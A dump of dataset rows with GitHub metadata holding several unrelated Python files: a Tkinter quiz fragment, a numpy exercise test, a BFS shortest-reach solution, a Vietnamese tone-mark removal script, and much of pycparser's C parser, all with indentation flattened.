partner.combined_button.config(state=NORMAL)
self.question_box.destroy() # closes question GUI
def enter_question(self):
print("Wrong answer") # prints to test button
# main routine
if __name__ == "__main__":
root = Tk()
root.title("Math Quiz")
something = MathQuiz()
root.mainloop()
| [
"[email protected]"
]
| |
96c8aab9ccb46dfa1211316172d290d9a600c701 | 6713b68c912af377c741b26fe31db0fe6f6194d4 | /1st Term/Data_Structure_and_Algorithms/Codes/Exercises/ses07/tests/q5.py | 5cb7344c66b6cf0467faf08698d3e66fc4443db3 | []
| no_license | Lanottez/IC_BA_2020 | 820e8d9c1dbb473ed28520450ec702f00c6684ed | 8abd40c6a5720e75337c20fa6ea89ce4588016af | refs/heads/master | 2023-08-25T05:52:08.259239 | 2021-11-03T07:27:11 | 2021-11-03T07:27:11 | 298,837,917 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | test = {
'name': 'Numpy - Q5',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> # It looks like you didn't give anything the name
>>> # fb_vol. Maybe there's a typo, or maybe you
>>> # just need to run the cell above this test cell where you defined
>>> # fb_vol. (Click that cell and then click the "run
>>> # cell" button in the menu bar above.)
>>> 'fb_vol' in vars()
a7465ecc0421c9e0085a8a012fce1e93
# locked
""",
'hidden': False,
'locked': True
},
{
'code': r"""
>>> fb_vol//0.0001 == 161.0
a7465ecc0421c9e0085a8a012fce1e93
# locked
""",
'hidden': False,
'locked': True
}
],
'scored': False,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"[email protected]"
]
| |
435f09a949e10d5926b47462513ec6a935159a57 | ba4f68fb01aa32970dadea67cc8d039b4c0f6d9e | /python/facebook_abcs/graphs/bfs_short_reach.py | d7e090dc241a595327009effbf8e195b8a27e16d | []
| no_license | campbellmarianna/Code-Challenges | 12a7808563e36b1a2964f10ae64618c0be41b6c0 | 12e21c51665d81cf1ea94c2005f4f9d3584b66ec | refs/heads/master | 2021-08-03T23:23:58.297437 | 2020-05-15T07:13:46 | 2020-05-15T07:13:46 | 168,234,828 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,585 | py | '''
Prompt:
Consider an undirected graph where each edge is the same weight and each of the nodes is labeled consecutively.
You will be given a number of queries. For each query, you will be given a list of edges describing an undirected graph. After you create a representation of the graph, you must determine and report the shortest distance to each of the other nodes from a given starting position using the breadth-first search algorithm (BFS). Distances are to be reported in node number order, ascending. If a node is unreachable, print -1 for that node. Each of the edges weighs 6 units of distance.
For example, starting from node s, the distance to every other node is computed; each edge traversed adds 6 units, and any node that cannot be reached is reported with the required distance of -1.
Function Description
Complete the bfs function in the editor below. It must return an array of integers representing distances from the start node to each other node in node ascending order. If a node is unreachable, its distance is -1.
bfs has the following parameter(s):
n: the integer number of nodes
m: the integer number of edges
edges: a 2D array of start and end nodes for edges
s: the node to start traversals from
Input Format
The first line contains an integer q, the number of queries. Each of the following q sets of lines has the following format:
The first line contains two space-separated integers n and m, the number of nodes and edges in the graph.
Each of the m subsequent lines contains two space-separated integers, u and v, describing an edge connecting node u to node v.
The last line contains a single integer, s, denoting the index of the starting node.
Constraints
Output Format
For each of the q queries, print a single line of space-separated integers denoting the shortest distances to each of the other n-1 nodes from starting position s. These distances should be listed sequentially by node number, ascending, but should not include node s. If some node is unreachable from s, print -1 as the distance to that node.
Sample Input
2 # the number of queries
4 2 # n: number of nodes m: number of edges in the graph
1 2 # u and v: describing an edge connecting node u to node v
1 3
1
3 1
2 3
2 # s: denoting the index of the starting node.
Sample Output
6 6 -1
-1 6
'''
# Very helpful breadth-first search explainer (loop over the frontier, adding neighbors to a queue):
# https://www.youtube.com/watch?v=-uR7BSfNJko
# Getting user input Iteration #1
# N = int(input())
# print(N)
# for _ in range(N):
# parts = input().strip().split(' ')
# print(parts)
import fileinput  # this import was missing in the original snippet
for line in fileinput.input():
parts = line.strip().split(' ')
print(parts)
# Along with Breadth First Search Algorithm by lorisrossi https://www.hackerrank.com/challenges/bfsshortreach/forum
def bfs(n, m, edges, s):
from collections import deque
# Build graph
graph = {}
for num in range(1, n+1):
graph[num] = set()
for l, r in edges:
graph[l].add(r)
graph[r].add(l)
reached = {}
# Explore graph once
frontier = deque([(s, 0)])
seen = {s}
while frontier:
curr_node, curr_cost = frontier.popleft()
for nbour in graph[curr_node]:
if nbour not in seen:
seen.add(nbour)
reached[nbour] = curr_cost+6
frontier.append((nbour, curr_cost+6))
result = []
for node in range(1, n+1):
if s != node:
result.append(reached.get(node, -1))
return result
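# Quick check against the sample queries in the prompt above:
#   bfs(4, 2, [(1, 2), (1, 3)], 1) -> [6, 6, -1]
#   bfs(3, 1, [(2, 3)], 2) -> [-1, 6]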
| [
"[email protected]"
]
| |
47dd3a6058d1b02752e213e67af6ad515280a64c | 4ddc0d9f83bb9f7dc917749f6085ab1881510bce | /preprocess.py | f045d2bea897ade4e29cf706d4fe1d88e9aadca4 | []
| no_license | dannyng95/VTMS-ER | 0c6a839d4167c3cd312ca41476033d02e0c1caf8 | 9a4eedfaeb67d51268ede29fc82e333ab29e49e9 | refs/heads/main | 2023-01-24T13:45:30.647636 | 2020-12-07T07:03:47 | 2020-12-07T07:03:47 | 318,388,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,019 | py | import pickle
import json
from tqdm import tqdm
import glob2
import codecs
import csv
import re
import sys
import random
import string
# https://realpython.com/python-encodings-guide/
# List of Vietnamese characters with diacritics (tone marks)
intab_l = "ạảãàáâậầấẩẫăắằặẳẵóòọõỏôộổỗồốơờớợởỡéèẻẹẽêếềệểễúùụủũưựữửừứíìịỉĩýỳỷỵỹđ"
ascii_lowercase = 'abcdefghijklmnopqrstuvwxyz'
digits = '0123456789'
punctuation = r"""!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
whitespace = ' '
accept_strings = intab_l + ascii_lowercase + digits + punctuation + whitespace
r = re.compile('^[' + accept_strings + ']+$')
# Check that a string contains only Vietnamese-acceptable characters:
def _check_tieng_viet(seq):
if re.match(r, seq.lower()):
return True
else:
return False
# _check_tieng_viet('tiếng việt thần thánh cực kỳ')
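# -> True (every character is within accept_strings)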
# Tone-mark removal function:
def remove_tone_line(utf8_str):
intab_l = "ạảãàáâậầấẩẫăắằặẳẵóòọõỏôộổỗồốơờớợởỡéèẻẹẽêếềệểễúùụủũưựữửừứíìịỉĩýỳỷỵỹđ"
intab_u = "ẠẢÃÀÁÂẬẦẤẨẪĂẮẰẶẲẴÓÒỌÕỎÔỘỔỖỒỐƠỜỚỢỞỠÉÈẺẸẼÊẾỀỆỂỄÚÙỤỦŨƯỰỮỬỪỨÍÌỊỈĨÝỲỶỴỸĐ"
intab = list(intab_l+intab_u)
outtab_l = "a"*17 + "o"*17 + "e"*11 + "u"*11 + "i"*5 + "y"*5 + "d"
outtab_u = "A"*17 + "O"*17 + "E"*11 + "U"*11 + "I"*5 + "Y"*5 + "D"
outtab = outtab_l + outtab_u
    # Build a regex that matches any toned character, e.g. 'ạ|ả|ã|...'
    r = re.compile("|".join(intab))
    # Dictionary mapping each toned character to its base letter, e.g. {'â': 'a'}
    replaces_dict = dict(zip(intab, outtab))
    # Replace every toned character using the regex and the mapping above
non_dia_str = r.sub(lambda m: replaces_dict[m.group(0)], utf8_str)
return non_dia_str
# remove_tone_line('Đi một ngày đàng học 1 sàng khôn')
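# -> 'Di mot ngay dang hoc 1 sang khon'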
| [
"[email protected]"
]
| |
8cb3d749f4466525d40f270c8a048fd83397d6b0 | e25e7f0d944d302c2fd13b7517d97c5e0b5558ec | /FixTree_TBCNN/pycparser/c_parser.py | 9a9d09657ad6d9acb7465f692d2e3c1c7d25ba04 | []
| no_license | NizhenJenny/FixTree | 06702a0d529d861e34b045aac286434b0ce3d86f | be30a2cdeb6cc0aa13f29d2cd4d4ce325f00f2a0 | refs/heads/master | 2020-05-24T21:33:04.030992 | 2019-08-19T09:52:10 | 2019-08-19T09:52:10 | 187,477,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 63,913 | py | #------------------------------------------------------------------------------
# pycparser: c_parser.py
#
# CParser class: Parser and AST builder for the C language
#
# Copyright (C) 2008-2015, Eli Bendersky
# License: BSD
#------------------------------------------------------------------------------
import re
from .ply import yacc
from . import c_ast
from .c_lexer import CLexer
from .plyparser import PLYParser, Coord, ParseError
from .ast_transforms import fix_switch_cases
class CParser(PLYParser):
def __init__(
self,
lex_optimize=True,
lextab='pycparser.lextab',
yacc_optimize=True,
yacctab='pycparser.yacctab',
yacc_debug=False,
taboutputdir=''):
""" Create a new CParser.
Some arguments for controlling the debug/optimization
level of the parser are provided. The defaults are
tuned for release/performance mode.
The simple rules for using them are:
*) When tweaking CParser/CLexer, set these to False
*) When releasing a stable parser, set to True
lex_optimize:
Set to False when you're modifying the lexer.
Otherwise, changes in the lexer won't be used, if
some lextab.py file exists.
When releasing with a stable lexer, set to True
to save the re-generation of the lexer table on
each run.
lextab:
Points to the lex table that's used for optimized
mode. Only if you're modifying the lexer and want
some tests to avoid re-generating the table, make
this point to a local lex table file (that's been
earlier generated with lex_optimize=True)
yacc_optimize:
Set to False when you're modifying the parser.
Otherwise, changes in the parser won't be used, if
some parsetab.py file exists.
When releasing with a stable parser, set to True
to save the re-generation of the parser table on
each run.
yacctab:
Points to the yacc table that's used for optimized
mode. Only if you're modifying the parser, make
this point to a local yacc table file
yacc_debug:
Generate a parser.out file that explains how yacc
built the parsing table from the grammar.
taboutputdir:
Set this parameter to control the location of generated
lextab and yacctab files.
"""
self.clex = CLexer(
error_func=self._lex_error_func,
on_lbrace_func=self._lex_on_lbrace_func,
on_rbrace_func=self._lex_on_rbrace_func,
type_lookup_func=self._lex_type_lookup_func)
self.clex.build(
optimize=lex_optimize,
lextab=lextab,
outputdir=taboutputdir)
self.tokens = self.clex.tokens
rules_with_opt = [
'abstract_declarator',
'assignment_expression',
'declaration_list',
'declaration_specifiers',
'designation',
'expression',
'identifier_list',
'init_declarator_list',
'initializer_list',
'parameter_type_list',
'specifier_qualifier_list',
'block_item_list',
'type_qualifier_list',
'struct_declarator_list'
]
for rule in rules_with_opt:
self._create_opt_rule(rule)
self.cparser = yacc.yacc(
module=self,
start='translation_unit_or_empty',
debug=yacc_debug,
optimize=yacc_optimize,
tabmodule=yacctab,
outputdir=taboutputdir)
# Stack of scopes for keeping track of symbols. _scope_stack[-1] is
# the current (topmost) scope. Each scope is a dictionary that
# specifies whether a name is a type. If _scope_stack[n][name] is
# True, 'name' is currently a type in the scope. If it's False,
# 'name' is used in the scope but not as a type (for instance, if we
# saw: int name;
# If 'name' is not a key in _scope_stack[n] then 'name' was not defined
# in this scope at all.
self._scope_stack = [dict()]
# Keeps track of the last token given to yacc (the lookahead token)
self._last_yielded_token = None
def parse(self, text, filename='', debuglevel=0):
""" Parses C code and returns an AST.
text:
A string containing the C source code
filename:
Name of the file being parsed (for meaningful
error messages)
debuglevel:
Debug level to yacc
"""
self.clex.filename = filename
self.clex.reset_lineno()
self._scope_stack = [dict()]
self._last_yielded_token = None
return self.cparser.parse(
input=text,
lexer=self.clex,
debug=debuglevel)
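    # Typical usage (a sketch):
    #   parser = CParser()
    #   ast = parser.parse('int x = 3;', filename='<none>')
    #   ast.show()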
######################-- PRIVATE --######################
def _push_scope(self):
self._scope_stack.append(dict())
def _pop_scope(self):
assert len(self._scope_stack) > 1
self._scope_stack.pop()
def _add_typedef_name(self, name, coord):
""" Add a new typedef name (ie a TYPEID) to the current scope
"""
if not self._scope_stack[-1].get(name, True):
self._parse_error(
"Typedef %r previously declared as non-typedef "
"in this scope" % name, coord)
self._scope_stack[-1][name] = True
def _add_identifier(self, name, coord):
""" Add a new object, function, or enum member name (ie an ID) to the
current scope
"""
if self._scope_stack[-1].get(name, False):
self._parse_error(
"Non-typedef %r previously declared as typedef "
"in this scope" % name, coord)
self._scope_stack[-1][name] = False
def _is_type_in_scope(self, name):
""" Is *name* a typedef-name in the current scope?
"""
for scope in reversed(self._scope_stack):
# If name is an identifier in this scope it shadows typedefs in
# higher scopes.
in_scope = scope.get(name)
if in_scope is not None: return in_scope
return False
def _lex_error_func(self, msg, line, column):
self._parse_error(msg, self._coord(line, column))
def _lex_on_lbrace_func(self):
self._push_scope()
def _lex_on_rbrace_func(self):
self._pop_scope()
def _lex_type_lookup_func(self, name):
""" Looks up types that were previously defined with
typedef.
Passed to the lexer for recognizing identifiers that
are types.
"""
is_type = self._is_type_in_scope(name)
return is_type
def _get_yacc_lookahead_token(self):
""" We need access to yacc's lookahead token in certain cases.
This is the last token yacc requested from the lexer, so we
ask the lexer.
"""
return self.clex.last_token
# To understand what's going on here, read sections A.8.5 and
# A.8.6 of K&R2 very carefully.
#
# A C type consists of a basic type declaration, with a list
# of modifiers. For example:
#
# int *c[5];
#
# The basic declaration here is 'int c', and the pointer and
# the array are the modifiers.
#
# Basic declarations are represented by TypeDecl (from module c_ast) and the
# modifiers are FuncDecl, PtrDecl and ArrayDecl.
#
# The standard states that whenever a new modifier is parsed, it should be
# added to the end of the list of modifiers. For example:
#
# K&R2 A.8.6.2: Array Declarators
#
# In a declaration T D where D has the form
# D1 [constant-expression-opt]
# and the type of the identifier in the declaration T D1 is
# "type-modifier T", the type of the
# identifier of D is "type-modifier array of T"
#
# This is what this method does. The declarator it receives
# can be a list of declarators ending with TypeDecl. It
# tacks the modifier to the end of this list, just before
# the TypeDecl.
#
# Additionally, the modifier may be a list itself. This is
# useful for pointers, that can come as a chain from the rule
# p_pointer. In this case, the whole modifier list is spliced
# into the new location.
def _type_modify_decl(self, decl, modifier):
""" Tacks a type modifier on a declarator, and returns
the modified declarator.
Note: the declarator and modifier may be modified
"""
#~ print '****'
#~ decl.show(offset=3)
#~ modifier.show(offset=3)
#~ print '****'
modifier_head = modifier
modifier_tail = modifier
# The modifier may be a nested list. Reach its tail.
#
while modifier_tail.type:
modifier_tail = modifier_tail.type
# If the decl is a basic type, just tack the modifier onto
# it
#
if isinstance(decl, c_ast.TypeDecl):
modifier_tail.type = decl
return modifier
else:
# Otherwise, the decl is a list of modifiers. Reach
# its tail and splice the modifier onto the tail,
# pointing to the underlying basic type.
#
decl_tail = decl
while not isinstance(decl_tail.type, c_ast.TypeDecl):
decl_tail = decl_tail.type
modifier_tail.type = decl_tail.type
decl_tail.type = modifier_head
return decl
# Due to the order in which declarators are constructed,
# they have to be fixed in order to look like a normal AST.
#
# When a declaration arrives from syntax construction, it has
# these problems:
# * The innermost TypeDecl has no type (because the basic
# type is only known at the uppermost declaration level)
# * The declaration has no variable name, since that is saved
# in the innermost TypeDecl
# * The typename of the declaration is a list of type
# specifiers, and not a node. Here, basic identifier types
# should be separated from more complex types like enums
# and structs.
#
# This method fixes these problems.
#
def _fix_decl_name_type(self, decl, typename):
""" Fixes a declaration. Modifies decl.
"""
# Reach the underlying basic type
#
type = decl
while not isinstance(type, c_ast.TypeDecl):
type = type.type
decl.name = type.declname
type.quals = decl.quals
# The typename is a list of types. If any type in this
# list isn't an IdentifierType, it must be the only
# type in the list (it's illegal to declare "int enum ..")
# If all the types are basic, they're collected in the
# IdentifierType holder.
#
for tn in typename:
if not isinstance(tn, c_ast.IdentifierType):
if len(typename) > 1:
self._parse_error(
"Invalid multiple types specified", tn.coord)
else:
type.type = tn
return decl
if not typename:
# Functions default to returning int
#
if not isinstance(decl.type, c_ast.FuncDecl):
self._parse_error(
"Missing type in declaration", decl.coord)
type.type = c_ast.IdentifierType(
['int'],
coord=decl.coord)
else:
# At this point, we know that typename is a list of IdentifierType
# nodes. Concatenate all the names into a single list.
#
type.type = c_ast.IdentifierType(
[name for id in typename for name in id.names],
coord=typename[0].coord)
return decl
def _add_declaration_specifier(self, declspec, newspec, kind):
""" Declaration specifiers are represented by a dictionary
with the entries:
* qual: a list of type qualifiers
* storage: a list of storage type qualifiers
* type: a list of type specifiers
* function: a list of function specifiers
This method is given a declaration specifier, and a
new specifier of a given kind.
Returns the declaration specifier, with the new
specifier incorporated.
"""
spec = declspec or dict(qual=[], storage=[], type=[], function=[])
spec[kind].insert(0, newspec)
return spec
def _build_declarations(self, spec, decls, typedef_namespace=False):
""" Builds a list of declarations all sharing the given specifiers.
If typedef_namespace is true, each declared name is added
to the "typedef namespace", which also includes objects,
functions, and enum constants.
"""
is_typedef = 'typedef' in spec['storage']
declarations = []
# Bit-fields are allowed to be unnamed.
#
if decls[0].get('bitsize') is not None:
pass
# When redeclaring typedef names as identifiers in inner scopes, a
# problem can occur where the identifier gets grouped into
# spec['type'], leaving decl as None. This can only occur for the
# first declarator.
#
elif decls[0]['decl'] is None:
if len(spec['type']) < 2 or len(spec['type'][-1].names) != 1 or \
not self._is_type_in_scope(spec['type'][-1].names[0]):
coord = '?'
for t in spec['type']:
if hasattr(t, 'coord'):
coord = t.coord
break
self._parse_error('Invalid declaration', coord)
# Make this look as if it came from "direct_declarator:ID"
decls[0]['decl'] = c_ast.TypeDecl(
declname=spec['type'][-1].names[0],
type=None,
quals=None,
coord=spec['type'][-1].coord)
# Remove the "new" type's name from the end of spec['type']
del spec['type'][-1]
# A similar problem can occur where the declaration ends up looking
# like an abstract declarator. Give it a name if this is the case.
#
elif not isinstance(decls[0]['decl'],
(c_ast.Struct, c_ast.Union, c_ast.IdentifierType)):
decls_0_tail = decls[0]['decl']
while not isinstance(decls_0_tail, c_ast.TypeDecl):
decls_0_tail = decls_0_tail.type
if decls_0_tail.declname is None:
decls_0_tail.declname = spec['type'][-1].names[0]
del spec['type'][-1]
for decl in decls:
assert decl['decl'] is not None
if is_typedef:
declaration = c_ast.Typedef(
name=None,
quals=spec['qual'],
storage=spec['storage'],
type=decl['decl'],
coord=decl['decl'].coord)
else:
declaration = c_ast.Decl(
name=None,
quals=spec['qual'],
storage=spec['storage'],
funcspec=spec['function'],
type=decl['decl'],
init=decl.get('init'),
bitsize=decl.get('bitsize'),
coord=decl['decl'].coord)
if isinstance(declaration.type,
(c_ast.Struct, c_ast.Union, c_ast.IdentifierType)):
fixed_decl = declaration
else:
fixed_decl = self._fix_decl_name_type(declaration, spec['type'])
# Add the type name defined by typedef to a
# symbol table (for usage in the lexer)
#
if typedef_namespace:
if is_typedef:
self._add_typedef_name(fixed_decl.name, fixed_decl.coord)
else:
self._add_identifier(fixed_decl.name, fixed_decl.coord)
declarations.append(fixed_decl)
return declarations
def _build_function_definition(self, spec, decl, param_decls, body):
""" Builds a function definition.
"""
assert 'typedef' not in spec['storage']
declaration = self._build_declarations(
spec=spec,
decls=[dict(decl=decl, init=None)],
typedef_namespace=True)[0]
return c_ast.FuncDef(
decl=declaration,
param_decls=param_decls,
body=body,
coord=decl.coord)
def _select_struct_union_class(self, token):
""" Given a token (either STRUCT or UNION), selects the
appropriate AST class.
"""
if token == 'struct':
return c_ast.Struct
else:
return c_ast.Union
##
## Precedence and associativity of operators
##
precedence = (
('left', 'LOR'),
('left', 'LAND'),
('left', 'OR'),
('left', 'XOR'),
('left', 'AND'),
('left', 'EQ', 'NE'),
('left', 'GT', 'GE', 'LT', 'LE'),
('left', 'RSHIFT', 'LSHIFT'),
('left', 'PLUS', 'MINUS'),
('left', 'TIMES', 'DIVIDE', 'MOD')
)
##
## Grammar productions
## Implementation of the BNF defined in K&R2 A.13
##
# Wrapper around a translation unit, to allow for empty input.
# Not strictly part of the C99 Grammar, but useful in practice.
#
def p_translation_unit_or_empty(self, p):
""" translation_unit_or_empty : translation_unit
| empty
"""
if p[1] is None:
p[0] = c_ast.FileAST([])
else:
p[0] = c_ast.FileAST(p[1])
def p_translation_unit_1(self, p):
""" translation_unit : external_declaration
"""
# Note: external_declaration is already a list
#
p[0] = p[1]
def p_translation_unit_2(self, p):
""" translation_unit : translation_unit external_declaration
"""
if p[2] is not None:
p[1].extend(p[2])
p[0] = p[1]
# Declarations always come as lists (because they can be
# several in one line), so we wrap the function definition
# into a list as well, to make the return value of
    # external_declaration homogeneous.
#
def p_external_declaration_1(self, p):
""" external_declaration : function_definition
"""
p[0] = [p[1]]
def p_external_declaration_2(self, p):
""" external_declaration : declaration
"""
p[0] = p[1]
def p_external_declaration_3(self, p):
""" external_declaration : pp_directive
"""
p[0] = p[1]
def p_external_declaration_4(self, p):
""" external_declaration : SEMI
"""
p[0] = None
def p_pp_directive(self, p):
""" pp_directive : PPHASH
"""
self._parse_error('Directives not supported yet',
self._coord(p.lineno(1)))
# In function definitions, the declarator can be followed by
# a declaration list, for old "K&R style" function definitios.
#
def p_function_definition_1(self, p):
""" function_definition : declarator declaration_list_opt compound_statement
"""
# no declaration specifiers - 'int' becomes the default type
spec = dict(
qual=[],
storage=[],
type=[c_ast.IdentifierType(['int'],
coord=self._coord(p.lineno(1)))],
function=[])
p[0] = self._build_function_definition(
spec=spec,
decl=p[1],
param_decls=p[2],
body=p[3])
def p_function_definition_2(self, p):
""" function_definition : declaration_specifiers declarator declaration_list_opt compound_statement
"""
spec = p[1]
p[0] = self._build_function_definition(
spec=spec,
decl=p[2],
param_decls=p[3],
body=p[4])
def p_statement(self, p):
""" statement : labeled_statement
| expression_statement
| compound_statement
| selection_statement
| iteration_statement
| jump_statement
"""
p[0] = p[1]
# In C, declarations can come several in a line:
# int x, *px, romulo = 5;
#
# However, for the AST, we will split them to separate Decl
# nodes.
#
# This rule splits its declarations and always returns a list
# of Decl nodes, even if it's one element long.
#
def p_decl_body(self, p):
""" decl_body : declaration_specifiers init_declarator_list_opt
"""
spec = p[1]
# p[2] (init_declarator_list_opt) is either a list or None
#
if p[2] is None:
# By the standard, you must have at least one declarator unless
# declaring a structure tag, a union tag, or the members of an
# enumeration.
#
ty = spec['type']
s_u_or_e = (c_ast.Struct, c_ast.Union, c_ast.Enum)
if len(ty) == 1 and isinstance(ty[0], s_u_or_e):
decls = [c_ast.Decl(
name=None,
quals=spec['qual'],
storage=spec['storage'],
funcspec=spec['function'],
type=ty[0],
init=None,
bitsize=None,
coord=ty[0].coord)]
# However, this case can also occur on redeclared identifiers in
# an inner scope. The trouble is that the redeclared type's name
# gets grouped into declaration_specifiers; _build_declarations
# compensates for this.
#
else:
decls = self._build_declarations(
spec=spec,
decls=[dict(decl=None, init=None)],
typedef_namespace=True)
else:
decls = self._build_declarations(
spec=spec,
decls=p[2],
typedef_namespace=True)
p[0] = decls
# The declaration has been split to a decl_body sub-rule and
# SEMI, because having them in a single rule created a problem
# for defining typedefs.
#
# If a typedef line was directly followed by a line using the
# type defined with the typedef, the type would not be
# recognized. This is because to reduce the declaration rule,
# the parser's lookahead asked for the token after SEMI, which
# was the type from the next line, and the lexer had no chance
# to see the updated type symbol table.
#
# Splitting solves this problem, because after seeing SEMI,
# the parser reduces decl_body, which actually adds the new
# type into the table to be seen by the lexer before the next
# line is reached.
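    # For example:
    #   typedef int T;
    #   T x;
    # Without the split, 'T' on the second line would already have been
    # tokenized as a plain ID before the typedef was recorded.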
def p_declaration(self, p):
""" declaration : decl_body SEMI
"""
p[0] = p[1]
# Since each declaration is a list of declarations, this
# rule will combine all the declarations and return a single
# list
#
def p_declaration_list(self, p):
""" declaration_list : declaration
| declaration_list declaration
"""
p[0] = p[1] if len(p) == 2 else p[1] + p[2]
def p_declaration_specifiers_1(self, p):
""" declaration_specifiers : type_qualifier declaration_specifiers_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'qual')
def p_declaration_specifiers_2(self, p):
""" declaration_specifiers : type_specifier declaration_specifiers_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'type')
def p_declaration_specifiers_3(self, p):
""" declaration_specifiers : storage_class_specifier declaration_specifiers_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'storage')
def p_declaration_specifiers_4(self, p):
""" declaration_specifiers : function_specifier declaration_specifiers_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'function')
def p_storage_class_specifier(self, p):
""" storage_class_specifier : AUTO
| REGISTER
| STATIC
| EXTERN
| TYPEDEF
"""
p[0] = p[1]
def p_function_specifier(self, p):
""" function_specifier : INLINE
"""
p[0] = p[1]
def p_type_specifier_1(self, p):
""" type_specifier : VOID
| _BOOL
| CHAR
| SHORT
| INT
| LONG
| FLOAT
| DOUBLE
| _COMPLEX
| SIGNED
| UNSIGNED
"""
p[0] = c_ast.IdentifierType([p[1]], coord=self._coord(p.lineno(1)))
def p_type_specifier_2(self, p):
""" type_specifier : typedef_name
| enum_specifier
| struct_or_union_specifier
"""
p[0] = p[1]
def p_type_qualifier(self, p):
""" type_qualifier : CONST
| RESTRICT
| VOLATILE
"""
p[0] = p[1]
def p_init_declarator_list_1(self, p):
""" init_declarator_list : init_declarator
| init_declarator_list COMMA init_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
# If the code is declaring a variable that was declared a typedef in an
# outer scope, yacc will think the name is part of declaration_specifiers,
# not init_declarator, and will then get confused by EQUALS. Pass None
# up in place of declarator, and handle this at a higher level.
#
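    # Illustrative case (assumed): with "typedef int T;" in an outer
    # scope, the inner declaration "int T = 5;" lexes T as TYPEID, so it
    # is swallowed by declaration_specifiers and only "= 5" remains for
    # this rule to match.
    #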
def p_init_declarator_list_2(self, p):
""" init_declarator_list : EQUALS initializer
"""
p[0] = [dict(decl=None, init=p[2])]
# Similarly, if the code contains duplicate typedefs of, for example,
# array types, the array portion will appear as an abstract declarator.
#
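    # Illustrative case (assumed):
    #
    #   typedef int A[10];
    #   typedef int A[10];  /* duplicate typedef, tolerated by e.g. gcc */
    #
    # In the second line "int A" is consumed as specifiers, leaving
    # "[10]" to parse as an abstract declarator.
    #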
def p_init_declarator_list_3(self, p):
""" init_declarator_list : abstract_declarator
"""
p[0] = [dict(decl=p[1], init=None)]
# Returns a {decl=<declarator> : init=<initializer>} dictionary
# If there's no initializer, uses None
#
def p_init_declarator(self, p):
""" init_declarator : declarator
| declarator EQUALS initializer
"""
p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None))
def p_specifier_qualifier_list_1(self, p):
""" specifier_qualifier_list : type_qualifier specifier_qualifier_list_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'qual')
def p_specifier_qualifier_list_2(self, p):
""" specifier_qualifier_list : type_specifier specifier_qualifier_list_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'type')
# TYPEID is allowed here (and in other struct/enum related tag names), because
# struct/enum tags reside in their own namespace and can be named the same as types
#
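    # For example (assumed): after "typedef int X;", the declaration
    # "struct X { int v; };" is legal -- the tag X does not clash with
    # the type name X.
    #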
def p_struct_or_union_specifier_1(self, p):
""" struct_or_union_specifier : struct_or_union ID
| struct_or_union TYPEID
"""
klass = self._select_struct_union_class(p[1])
p[0] = klass(
name=p[2],
decls=None,
coord=self._coord(p.lineno(2)))
def p_struct_or_union_specifier_2(self, p):
""" struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close
"""
klass = self._select_struct_union_class(p[1])
p[0] = klass(
name=None,
decls=p[3],
coord=self._coord(p.lineno(2)))
def p_struct_or_union_specifier_3(self, p):
""" struct_or_union_specifier : struct_or_union ID brace_open struct_declaration_list brace_close
| struct_or_union TYPEID brace_open struct_declaration_list brace_close
"""
klass = self._select_struct_union_class(p[1])
p[0] = klass(
name=p[2],
decls=p[4],
coord=self._coord(p.lineno(2)))
def p_struct_or_union(self, p):
""" struct_or_union : STRUCT
| UNION
"""
p[0] = p[1]
# Combine all declarations into a single list
#
def p_struct_declaration_list(self, p):
""" struct_declaration_list : struct_declaration
| struct_declaration_list struct_declaration
"""
p[0] = p[1] if len(p) == 2 else p[1] + p[2]
def p_struct_declaration_1(self, p):
""" struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI
"""
spec = p[1]
assert 'typedef' not in spec['storage']
if p[2] is not None:
decls = self._build_declarations(
spec=spec,
decls=p[2])
elif len(spec['type']) == 1:
# Anonymous struct/union, gcc extension, C1x feature.
# Although the standard only allows structs/unions here, I see no
# reason to disallow other types since some compilers have typedefs
# here, and pycparser isn't about rejecting all invalid code.
#
node = spec['type'][0]
if isinstance(node, c_ast.Node):
decl_type = node
else:
decl_type = c_ast.IdentifierType(node)
decls = self._build_declarations(
spec=spec,
decls=[dict(decl=decl_type)])
else:
# Structure/union members can have the same names as typedefs.
# The trouble is that the member's name gets grouped into
# specifier_qualifier_list; _build_declarations compensates.
#
decls = self._build_declarations(
spec=spec,
decls=[dict(decl=None, init=None)])
p[0] = decls
def p_struct_declaration_2(self, p):
""" struct_declaration : specifier_qualifier_list abstract_declarator SEMI
"""
# "Abstract declarator?!", you ask? Structure members can have the
# same names as typedefs. The trouble is that the member's name gets
# grouped into specifier_qualifier_list, leaving any remainder to
# appear as an abstract declarator, as in:
# typedef int Foo;
# struct { Foo Foo[3]; };
#
p[0] = self._build_declarations(
spec=p[1],
decls=[dict(decl=p[2], init=None)])
def p_struct_declarator_list(self, p):
""" struct_declarator_list : struct_declarator
| struct_declarator_list COMMA struct_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
# struct_declarator passes up a dict with the keys: decl (for
# the underlying declarator) and bitsize (for the bitsize)
#
def p_struct_declarator_1(self, p):
""" struct_declarator : declarator
"""
p[0] = {'decl': p[1], 'bitsize': None}
def p_struct_declarator_2(self, p):
""" struct_declarator : declarator COLON constant_expression
| COLON constant_expression
"""
if len(p) > 3:
p[0] = {'decl': p[1], 'bitsize': p[3]}
else:
p[0] = {'decl': c_ast.TypeDecl(None, None, None), 'bitsize': p[2]}
def p_enum_specifier_1(self, p):
""" enum_specifier : ENUM ID
| ENUM TYPEID
"""
p[0] = c_ast.Enum(p[2], None, self._coord(p.lineno(1)))
def p_enum_specifier_2(self, p):
""" enum_specifier : ENUM brace_open enumerator_list brace_close
"""
p[0] = c_ast.Enum(None, p[3], self._coord(p.lineno(1)))
